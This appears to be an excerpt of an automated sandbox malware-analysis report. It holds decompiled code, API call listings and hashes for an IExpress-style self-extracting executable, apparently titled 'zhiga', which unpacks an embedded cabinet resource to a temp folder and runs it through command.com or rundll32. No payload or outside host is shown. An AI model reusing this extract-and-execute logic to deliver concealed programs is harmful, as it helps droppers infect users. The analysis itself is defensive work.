                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010C8C42), ref: 010C3D8F
                                                          • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010C3E26
                                                          • FreeLibrary.KERNEL32(00000000,?,010C8C42), ref: 010C3EFF
                                                          • LocalFree.KERNEL32(?,?,?,?,010C8C42), ref: 010C3F1F
                                                          • FreeLibrary.KERNEL32(00000000,?,010C8C42), ref: 010C3F40
                                                          • LocalFree.KERNEL32(?,?,?,?,010C8C42), ref: 010C3F47
                                                          • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010C8C42), ref: 010C3F76
                                                          • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010C8C42), ref: 010C3F80
                                                          • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010C8C42), ref: 010C3FC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                          • API String ID: 1032054927-3746868062
                                                          • Opcode ID: 6376574b984f668440fc0ccd2d22b3e6f69a0837c928c9d32c0d791b73c955ab
                                                          • Instruction ID: c6d863a1a8ecd78be10372a1e2e870dff37ff4a2f265458066f049b0875503f7
                                                          • Opcode Fuzzy Hash: 6376574b984f668440fc0ccd2d22b3e6f69a0837c928c9d32c0d791b73c955ab
                                                          • Instruction Fuzzy Hash: FAB1DE706243029FE770AF289845B6F7AE5BB84F40F10892EFAC5DA180E775C801CF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 10c1ae8-10c1b2c call 10c1680 144 10c1b2e-10c1b39 141->144 145 10c1b3b-10c1b40 141->145 146 10c1b46-10c1b61 call 10c1a84 144->146 145->146 149 10c1b9f-10c1bc2 call 10c1781 call 10c658a 146->149 150 10c1b63-10c1b65 146->150 159 10c1bc7-10c1bd3 call 10c66c8 149->159 151 10c1b68-10c1b6d 150->151 151->151 153 10c1b6f-10c1b74 151->153 153->149 155 10c1b76-10c1b7b 153->155 157 10c1b7d-10c1b81 155->157 158 10c1b83-10c1b86 155->158 157->158 161 10c1b8c-10c1b9d call 10c1680 157->161 158->149 162 10c1b88-10c1b8a 158->162 165 10c1bd9-10c1bf1 CompareStringA 159->165 166 10c1d73-10c1d7f call 10c66c8 159->166 161->159 162->149 162->161 165->166 168 10c1bf7-10c1c07 GetFileAttributesA 165->168 175 10c1df8-10c1e09 LocalAlloc 166->175 176 10c1d81-10c1d99 CompareStringA 166->176 170 10c1c0d-10c1c15 168->170 171 10c1d53-10c1d5e 168->171 170->171 174 10c1c1b-10c1c33 call 10c1a84 170->174 173 10c1d64-10c1d6e call 10c44b9 171->173 187 10c1e94-10c1ea4 call 10c6ce0 173->187 189 10c1c35-10c1c38 174->189 190 10c1c50-10c1c61 LocalAlloc 174->190 178 10c1e0b-10c1e1b GetFileAttributesA 175->178 179 10c1dd4-10c1ddf 175->179 176->175 181 10c1d9b-10c1da2 176->181 183 10c1e1d-10c1e1f 178->183 184 10c1e67-10c1e73 call 10c1680 178->184 179->173 186 10c1da5-10c1daa 181->186 183->184 188 10c1e21-10c1e3e call 10c1781 183->188 199 10c1e78-10c1e84 call 10c2aac 184->199 186->186 191 10c1dac-10c1db4 186->191 188->199 210 10c1e40-10c1e43 188->210 195 10c1c3a 189->195 196 10c1c40-10c1c4b call 10c1a84 189->196 190->179 198 10c1c67-10c1c72 190->198 197 10c1db7-10c1dbc 191->197 195->196 196->190 197->197 203 10c1dbe-10c1dd2 LocalAlloc 197->203 204 10c1c79-10c1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 10c1c74 198->205 209 10c1e89-10c1e92 199->209 203->179 211 10c1de1-10c1df3 call 10c171e 203->211 207 10c1cf8-10c1d07 204->207 208 10c1cc2-10c1ccc 204->208 205->204 215 10c1d09-10c1d21 GetShortPathNameA 207->215 216 
10c1d23 207->216 212 10c1cce 208->212 213 10c1cd3-10c1cf3 call 10c1680 * 2 208->213 209->187 210->199 214 10c1e45-10c1e65 call 10c16b3 * 2 210->214 211->209 212->213 213->209 214->199 220 10c1d28-10c1d2b 215->220 216->220 224 10c1d2d 220->224 225 10c1d32-10c1d4e call 10c171e 220->225 224->225 225->209
                                                          C-Code - Quality: 82%
                                                          			E010C1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v527;
                                                          				char _v528;
                                                          				char _v1552;
                                                          				CHAR* _v1556;
                                                          				int* _v1560;
                                                          				CHAR** _v1564;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t48;
                                                          				CHAR* _t53;
                                                          				CHAR* _t54;
                                                          				char* _t57;
                                                          				char* _t58;
                                                          				CHAR* _t60;
                                                          				void* _t62;
                                                          				signed char _t65;
                                                          				intOrPtr _t76;
                                                          				intOrPtr _t77;
                                                          				unsigned int _t85;
                                                          				CHAR* _t90;
                                                          				CHAR* _t92;
                                                          				char _t105;
                                                          				char _t106;
                                                          				CHAR** _t111;
                                                          				CHAR* _t115;
                                                          				intOrPtr* _t125;
                                                          				void* _t126;
                                                          				CHAR* _t132;
                                                          				CHAR* _t135;
                                                          				void* _t138;
                                                          				void* _t139;
                                                          				void* _t145;
                                                          				intOrPtr* _t146;
                                                          				char* _t148;
                                                          				CHAR* _t151;
                                                          				void* _t152;
                                                          				CHAR* _t155;
                                                          				CHAR* _t156;
                                                          				void* _t157;
                                                          				signed int _t158;
                                                          
                                                          				_t48 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t48 ^ _t158;
                                                          				_t108 = __ecx;
                                                          				_v1564 = _a4;
                                                          				_v1560 = _a8;
                                                          				E010C1680( &_v528, 0x104, __ecx);
                                                          				if(_v528 != 0x22) {
                                                          					_t135 = " ";
                                                          					_t53 =  &_v528;
                                                          				} else {
                                                          					_t135 = "\"";
                                                          					_t53 =  &_v527;
                                                          				}
                                                          				_t111 =  &_v1556;
                                                          				_v1556 = _t53;
                                                          				_t54 = E010C1A84(_t111, _t135);
                                                          				_t156 = _v1556;
                                                          				_t151 = _t54;
                                                          				if(_t156 == 0) {
                                                          					L12:
                                                          					_push(_t111);
                                                          					E010C1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          					E010C658A( &_v268, 0x104, _t156);
                                                          					goto L13;
                                                          				} else {
                                                          					_t132 = _t156;
                                                          					_t148 =  &(_t132[1]);
                                                          					do {
                                                          						_t105 =  *_t132;
                                                          						_t132 =  &(_t132[1]);
                                                          					} while (_t105 != 0);
                                                          					_t111 = _t132 - _t148;
                                                          					if(_t111 < 3) {
                                                          						goto L12;
                                                          					}
                                                          					_t106 = _t156[1];
                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                          							goto L12;
                                                          						} else {
                                                          							goto L11;
                                                          						}
                                                          					} else {
                                                          						L11:
                                                          						E010C1680( &_v268, 0x104, _t156);
                                                          						L13:
                                                          						_t138 = 0x2e;
                                                          						_t57 = E010C66C8(_t156, _t138);
                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                          							_t139 = 0x2e;
                                                          							_t115 = _t156;
                                                          							_t58 = E010C66C8(_t115, _t139);
                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                          								if(_t156 == 0) {
                                                          									goto L43;
                                                          								}
                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                          									E010C1680( &_v1552, 0x400, _t108);
                                                          								} else {
                                                          									_push(_t115);
                                                          									_t108 = 0x400;
                                                          									E010C1781( &_v1552, 0x400, _t115,  &_v268);
                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                          										E010C16B3( &_v1552, 0x400, " ");
                                                          										E010C16B3( &_v1552, 0x400, _t151);
                                                          									}
                                                          								}
                                                          								_t140 = _t156;
                                                          								 *_t156 = 0;
                                                          								E010C2AAC( &_v1552, _t156, _t156);
                                                          								goto L53;
                                                          							} else {
                                                          								_t108 = "Command.com /c %s";
                                                          								_t125 = "Command.com /c %s";
                                                          								_t145 = _t125 + 1;
                                                          								do {
                                                          									_t76 =  *_t125;
                                                          									_t125 = _t125 + 1;
                                                          								} while (_t76 != 0);
                                                          								_t126 = _t125 - _t145;
                                                          								_t146 =  &_v268;
                                                          								_t157 = _t146 + 1;
                                                          								do {
                                                          									_t77 =  *_t146;
                                                          									_t146 = _t146 + 1;
                                                          								} while (_t77 != 0);
                                                          								_t140 = _t146 - _t157;
                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                          								if(_t156 != 0) {
                                                          									E010C171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                          									goto L53;
                                                          								}
                                                          								goto L43;
                                                          							}
                                                          						} else {
                                                          							_t85 = GetFileAttributesA( &_v268);
                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                          								_t140 = 0x525;
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_t60 =  &_v268;
                                                          								goto L35;
                                                          							} else {
                                                          								_t140 = "[";
                                                          								_v1556 = _t151;
                                                          								_t90 = E010C1A84( &_v1556, "[");
                                                          								if(_t90 != 0) {
                                                          									if( *_t90 != 0) {
                                                          										_v1556 = _t90;
                                                          									}
                                                          									_t140 = "]";
                                                          									E010C1A84( &_v1556, "]");
                                                          								}
                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                          								if(_t156 == 0) {
                                                          									L43:
                                                          									_t60 = 0;
                                                          									_t140 = 0x4b5;
                                                          									_push(0);
                                                          									_push(0x10);
                                                          									_push(0);
                                                          									L35:
                                                          									_push(_t60);
                                                          									E010C44B9(0, _t140);
                                                          									_t62 = 0;
                                                          									goto L54;
                                                          								} else {
                                                          									_t155 = _v1556;
                                                          									_t92 = _t155;
                                                          									if( *_t155 == 0) {
                                                          										_t92 = "DefaultInstall";
                                                          									}
                                                          									 *0x10c9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                          									 *_v1560 = 1;
                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10c1140, _t156, 8,  &_v268) == 0) {
                                                          										 *0x10c9a34 =  *0x10c9a34 & 0xfffffffb;
                                                          										if( *0x10c9a40 != 0) {
                                                          											_t108 = "setupapi.dll";
                                                          										} else {
                                                          											_t108 = "setupx.dll";
                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                          										}
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										_push( &_v268);
                                                          										_push(_t155);
                                                          										E010C171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                          									} else {
                                                          										 *0x10c9a34 =  *0x10c9a34 | 0x00000004;
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										E010C1680(_t108, 0x104, _t155);
                                                          										_t140 = 0x200;
                                                          										E010C1680(_t156, 0x200,  &_v268);
                                                          									}
                                                          									L53:
                                                          									_t62 = 1;
                                                          									 *_v1564 = _t156;
                                                          									L54:
                                                          									_pop(_t152);
                                                          									return E010C6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1BE7
                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1BFE
                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1C57
                                                          • GetPrivateProfileIntA.KERNEL32 ref: 010C1C88
                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010C1140,00000000,00000008,?), ref: 010C1CB8
                                                          • GetShortPathNameA.KERNEL32 ref: 010C1D1B
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-472070384
                                                          • Opcode ID: 843711e680d983d17c67d66617ae6060900f14816ac1b674637f1a5c07771e31
                                                          • Instruction ID: 19d2aa5e50768bf806fda1634d44832057beecbec3c4e7441d5fe3463c49bf67
                                                          • Opcode Fuzzy Hash: 843711e680d983d17c67d66617ae6060900f14816ac1b674637f1a5c07771e31
                                                          • Instruction Fuzzy Hash: CAA14B70A00209DFEB70AB28CC44BEE77A9AB95B10F1442DDE5D5E32C2DB759D858F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Control-flow graph for function 010C597D; legend: Executed / Not Executed]
                                                          C-Code - Quality: 96%
                                                          			E010C597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				char _v16;
                                                          				char _v276;
                                                          				char _v788;
                                                          				long _v792;
                                                          				long _v796;
                                                          				long _v800;
                                                          				signed int _v804;
                                                          				long _v808;
                                                          				int _v812;
                                                          				long _v816;
                                                          				long _v820;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t46;
                                                          				int _t50;
                                                          				signed int _t55;
                                                          				void* _t66;
                                                          				int _t69;
                                                          				signed int _t73;
                                                          				signed short _t78;
                                                          				signed int _t87;
                                                          				signed int _t101;
                                                          				int _t102;
                                                          				unsigned int _t103;
                                                          				unsigned int _t105;
                                                          				signed int _t111;
                                                          				long _t112;
                                                          				signed int _t116;
                                                          				CHAR* _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          
                                                          				_t114 = __edi;
                                                          				_t46 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t46 ^ _t120;
                                                          				_v804 = __edx;
                                                          				_t118 = __ecx;
                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                          				if(_t50 != 0) {
                                                          					_push(__edi);
                                                          					_v796 = 0;
                                                          					_v792 = 0;
                                                          					_v800 = 0;
                                                          					_v808 = 0;
                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                          					__eflags = _t55;
                                                          					if(_t55 == 0) {
                                                          						L29:
                                                          						memset( &_v788, 0, 0x200);
                                                          						 *0x10c9124 = E010C6285();
                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          						_t110 = 0x4b0;
                                                          						L30:
                                                          						__eflags = 0;
                                                          						E010C44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                          						SetCurrentDirectoryA( &_v276);
                                                          						L31:
                                                          						_t66 = 0;
                                                          						__eflags = 0;
                                                          						L32:
                                                          						_pop(_t114);
                                                          						goto L33;
                                                          					}
                                                          					_t69 = _v792 * _v796;
                                                          					_v812 = _t69;
                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                          					__eflags = _t116;
                                                          					if(_t116 == 0) {
                                                          						goto L29;
                                                          					}
                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                          					__eflags = _t73;
                                                          					if(_t73 != 0) {
                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                          						_t101 =  &_v16;
                                                          						_t111 = 6;
                                                          						_t119 = _t118 - _t101;
                                                          						__eflags = _t119;
                                                          						while(1) {
                                                          							_t22 = _t111 - 4; // 0x2
                                                          							__eflags = _t22;
                                                          							if(_t22 == 0) {
                                                          								break;
                                                          							}
                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                          							__eflags = _t87;
                                                          							if(_t87 == 0) {
                                                          								break;
                                                          							}
                                                          							 *_t101 = _t87;
                                                          							_t101 = _t101 + 1;
                                                          							_t111 = _t111 - 1;
                                                          							__eflags = _t111;
                                                          							if(_t111 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t111;
                                                          						if(_t111 == 0) {
                                                          							_t101 = _t101 - 1;
                                                          							__eflags = _t101;
                                                          						}
                                                          						 *_t101 = 0;
                                                          						_t112 = 0x200;
                                                          						_t102 = _v812;
                                                          						_t78 = 0;
                                                          						_t118 = 8;
                                                          						while(1) {
                                                          							__eflags = _t102 - _t112;
                                                          							if(_t102 == _t112) {
                                                          								break;
                                                          							}
                                                          							_t112 = _t112 + _t112;
                                                          							_t78 = _t78 + 1;
                                                          							__eflags = _t78 - _t118;
                                                          							if(_t78 < _t118) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t78 - _t118;
                                                          						if(_t78 != _t118) {
                                                          							__eflags =  *0x10c9a34 & 0x00000008;
                                                          							if(( *0x10c9a34 & 0x00000008) == 0) {
                                                          								L20:
                                                          								_t103 =  *0x10c9a38; // 0x0
                                                          								_t110 =  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4));
                                                          								L21:
                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                          								if((_v804 & 0x00000003) != 3) {
                                                          									__eflags = _v804 & 0x00000001;
                                                          									if((_v804 & 0x00000001) == 0) {
                                                          										__eflags = _t103 - _t116;
                                                          									} else {
                                                          										__eflags = _t110 - _t116;
                                                          									}
                                                          								} else {
                                                          									__eflags = _t103 + _t110 - _t116;
                                                          								}
                                                          								if(__eflags <= 0) {
                                                          									 *0x10c9124 = 0;
                                                          									_t66 = 1;
                                                          								} else {
                                                          									_t66 = E010C268B(_a4, _t110, _t103,  &_v16);
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _v816 & 0x00008000;
                                                          							if((_v816 & 0x00008000) == 0) {
                                                          								goto L20;
                                                          							}
                                                          							_t105 =  *0x10c9a38; // 0x0
                                                          							_t110 =  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4));
                                                          							_t103 = (_t105 >> 2) +  *0x10c9a38;
                                                          							goto L21;
                                                          						}
                                                          						_t110 = 0x4c5;
                                                          						E010C44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                          						goto L31;
                                                          					}
                                                          					memset( &_v788, 0, 0x200);
                                                          					 *0x10c9124 = E010C6285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          					_t110 = 0x4f9;
                                                          					goto L30;
                                                          				} else {
                                                          					_t110 = 0x4bc;
                                                          					E010C44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t66 = 0;
                                                          					L33:
                                                          					return E010C6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                          				}
                                                          			}




































                                                          APIs
                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010C59A8
                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 010C59AF
                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010C5A13
                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 010C5A40
                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010C5A64
                                                          • memset.MSVCRT ref: 010C5A7C
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010C5A98
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010C5AA5
                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010C5BFC
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID:
                                                          • API String ID: 4237285672-0
                                                          • Opcode ID: cfe0f7ace8cf35a489a83c34b571db2955eb3cdf7b6e7226f611a8e2e7aae47a
                                                          • Instruction ID: 70a85ed3b4597c2ab662258453f80501a4a2fa558c6f14e52f28e34103818e61
                                                          • Opcode Fuzzy Hash: cfe0f7ace8cf35a489a83c34b571db2955eb3cdf7b6e7226f611a8e2e7aae47a
                                                          • Instruction Fuzzy Hash: 217193B5A0020CAFEB259B64CC85BFE77ADFB88744F1440ADF585D3184EA359E848F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 10c4fe0-10c501a call 10c468f FindResourceA LoadResource LockResource 377 10c5020-10c5027 374->377 378 10c5161-10c5163 374->378 379 10c5029-10c5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 10c5057-10c505e call 10c4efd 377->380 379->380 383 10c507c-10c50b4 380->383 384 10c5060-10c5077 call 10c44b9 380->384 389 10c50e8-10c5104 call 10c44b9 383->389 390 10c50b6-10c50da 383->390 388 10c5107-10c510e 384->388 392 10c511d-10c511f 388->392 393 10c5110-10c5117 FreeResource 388->393 398 10c5106 389->398 390->398 402 10c50dc 390->402 395 10c513a-10c5141 392->395 396 10c5121-10c5127 392->396 393->392 400 10c515f 395->400 401 10c5143-10c514a 395->401 396->395 399 10c5129-10c5135 call 10c44b9 396->399 398->388 399->395 400->378 401->400 404 10c514c-10c5159 SendMessageA 401->404 405 10c50e3-10c50e6 402->405 404->400 405->389 405->398
                                                          C-Code - Quality: 77%
                                                          			E010C4FE0(void* __edi, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* _t8;
                                                          				struct HWND__* _t9;
                                                          				int _t10;
                                                          				void* _t12;
                                                          				struct HWND__* _t24;
                                                          				struct HWND__* _t27;
                                                          				intOrPtr _t29;
                                                          				void* _t33;
                                                          				int _t34;
                                                          				CHAR* _t36;
                                                          				int _t37;
                                                          				intOrPtr _t47;
                                                          
                                                          				_t33 = __edi;
                                                          				_t36 = "CABINET";
                                                          				 *0x10c9144 = E010C468F(_t36, 0, 0);
                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                          				 *0x10c9140 = _t8;
                                                          				if(_t8 == 0) {
                                                          					return _t8;
                                                          				}
                                                          				_t9 =  *0x10c8584; // 0x0
                                                          				if(_t9 != 0) {
                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                          					ShowWindow(GetDlgItem( *0x10c8584, 0x841), 5);
                                                          				}
                                                          				_t10 = E010C4EFD(0, 0);
                                                          				if(_t10 != 0) {
                                                          					__imp__#20(E010C4CA0, E010C4CC0, E010C4980, E010C4A50, E010C4AD0, E010C4B60, E010C4BC0, 1, 0x10c9148, _t33);
                                                          					_t34 = _t10;
                                                          					if(_t34 == 0) {
                                                          						L8:
                                                          						_t29 =  *0x10c9148; // 0x0
                                                          						_t24 =  *0x10c8584; // 0x0
                                                          						E010C44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                          						_t37 = 0;
                                                          						L9:
                                                          						goto L10;
                                                          					}
                                                          					__imp__#22(_t34, "*MEMCAB", 0x10c1140, 0, E010C4CD0, 0, 0x10c9140); // executed
                                                          					_t37 = _t10;
                                                          					if(_t37 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					__imp__#23(_t34); // executed
                                                          					if(_t10 != 0) {
                                                          						goto L9;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					_t27 =  *0x10c8584; // 0x0
                                                          					E010C44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                          					_t37 = 0;
                                                          					L10:
                                                          					_t12 =  *0x10c9140; // 0x0
                                                          					if(_t12 != 0) {
                                                          						FreeResource(_t12);
                                                          						 *0x10c9140 = 0;
                                                          					}
                                                          					if(_t37 == 0) {
                                                          						_t47 =  *0x10c91d8; // 0x0
                                                          						if(_t47 == 0) {
                                                          							E010C44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                          						}
                                                          					}
                                                          					if(( *0x10c8a38 & 0x00000001) == 0 && ( *0x10c9a34 & 0x00000001) == 0) {
                                                          						SendMessageA( *0x10c8584, 0xfa1, _t37, 0);
                                                          					}
                                                          					return _t37;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010C4FFE
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 010C5006
                                                          • LockResource.KERNEL32(00000000), ref: 010C500D
                                                          • GetDlgItem.USER32(00000000,00000842), ref: 010C5030
                                                          • ShowWindow.USER32(00000000), ref: 010C5037
                                                          • GetDlgItem.USER32(00000841,00000005), ref: 010C504A
                                                          • ShowWindow.USER32(00000000), ref: 010C5051
                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010C5111
                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010C5159
                                                          Strings
                                                          Memory Dump Source
